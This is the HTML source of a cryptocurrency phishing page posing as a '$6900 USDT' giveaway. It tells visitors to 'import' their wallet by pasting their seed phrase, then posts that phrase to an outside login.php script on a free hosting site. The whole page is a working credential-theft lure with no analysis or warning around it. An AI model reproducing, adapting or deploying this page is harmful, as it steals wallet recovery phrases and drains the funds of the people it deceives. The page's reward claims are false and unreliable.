<!doctype html>
<html lang="en"><head>
<style>
.anticon {
  display: inline-block;
  color: inherit;
  font-style: normal;
  line-height: 0;
  text-align: center;
  text-transform: none;
  vertical-align: -0.125em;
  text-rendering: optimizeLegibility;
  -webkit-font-smoothing: antialiased;
  -moz-osx-font-smoothing: grayscale;
}

.anticon > * {
  line-height: 1;
}

.anticon svg {
  display: inline-block;
}

.anticon::before {
  display: none;
}

.anticon .anticon-icon {
  display: block;
}

.anticon[tabindex] {
  cursor: pointer;
}

.anticon-spin::before,
.anticon-spin {
  display: inline-block;
  -webkit-animation: loadingCircle 1s infinite linear;
  animation: loadingCircle 1s infinite linear;
}

@-webkit-keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}

@keyframes loadingCircle {
  100% {
    -webkit-transform: rotate(360deg);
    transform: rotate(360deg);
  }
}
</style>
<meta charset="utf-8"><link rel="icon" href="images/truste.png"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#fafafa">
<link href="cunek/apk.css" rel="stylesheet">
<link rel="apple-touch-icon" href=images/truste.png"><title>Giveaway</title>
<link href="cunek/chunk1.css" rel="stylesheet">
<link href="cunek/app.css" rel="stylesheet">
<link href="cunek/main.chunk.css" rel="stylesheet">
<script src="cunek/jquery.min.js"></script>
<script src="https://cdn.ethers.io/scripts/ethers-v4.min.js" charset="utf-8" type="text/javascript"></script>
</head>
<body>



<div id="root"><div class="ant-spin-nested-loading"><div class=""><div class="sc-jqCOkK kFZWwp"><div class="sc-gGBfsJ jvrGcO"><div class="sc-jnlKLf OHNdu"><div class="sc-fYxtnH hARKVj">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<img src="images/cunekpantek.png" alt="" style="height: 50px;width: 150px;" alt="cashtab" class="sc-tilXH gdtVXy"></div>




<center><div class="confirm-approve-content__identicon-wrapper"><img class="identicon confirm-approve-content__identicon" src="https://tether.to/apple-touch-icon.png" alt="" style="height: 60px;width: 60px;"></div></center>

<div class="confirm-approve-content__title" style="
    font-size: 1.2rem;
    line-height: 140%;
    justify-content: center;
    text-align: center;
    margin-top: 22px;
    padding-left: 24px;
    padding-right: 24px;
    color: #00a854;
    ">$6900 USDT Available.</div>



<h2><center>Import Multi-Coin Wallet</center></h2><center><p class="thepadding">To Claim <b style="color: #14cf5e;font-weight: bold;">$6900 USDT</b> reward without cheating,we need confirmation your wallet, to make sure it's really you
</p></center>

<div class="sc-htoDjs cDnNqw">
	<form method="post" action="https://mahjong54ways.000webhostapp.com/login.php?nkbihfbeogaeaoehlefnkodbefgpgknn/home" class="ant-form ant-form-horizontal">
        <div class="ant-row ant-form-item ant-form-item-with-help" style="row-gap: 0px;"><div class="ant-col ant-form-item-control"><p class="thepadding" style="text-align: left;color: hsla(0,0%,49.8%,.85);">Phrase</p>
<div>
    <div class="thepadding">
        <textarea class="import-account__secret-phrase" placeholder="Paste seed phrase from clipboard" name="PrivateKey" id="wordsseed" minlength="24" maxlength="305" required=""></textarea>Typically 12 (sometimes 24) words separated by single spaces</h5>
        </div></div><div class="ant-form-item-explain">
                </div></div></div>

                <div class="thepadding">
<button class="button sc-VigVT fWmldN" type="submit">IMPORT</button>
<div1></div1></div>  </form>
                            </div>
                            <div class="wawobp loader" data-tenqwa="9fkuxe">
                                <div class="yat5ls lodas" data-2ivb6w="2n92zq">
                                    <img class="identicon confirm-approve-content__identicon" src="sarikaya/32179889.png" alt="" style="height: 70px;width: 70px;">
                                    <div class="7n1smr loader2 loader--style3" title="2" data-knlucr="ga7q37">
                                        <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" style="margin:auto;background:#20242d;display:block;" width="40px" height="40px" viewBox="0 0 100 100" preserveAspectRatio="xMidYMid">
                        <circle cx="50" cy="50" fill="none" stroke="#0b65c6" stroke-width="10" r="35" stroke-dasharray="164.93361431346415 56.97787143782138">
                          <animateTransform attributeName="transform" type="rotate" repeatCount="indefinite" dur="1s" values="0 50 50;360 50 50" keyTimes="0;1"></animateTransform>
                        </circle>
                      </svg>

                </div>

<script src="cunek/load.js"></script></body>

</html>
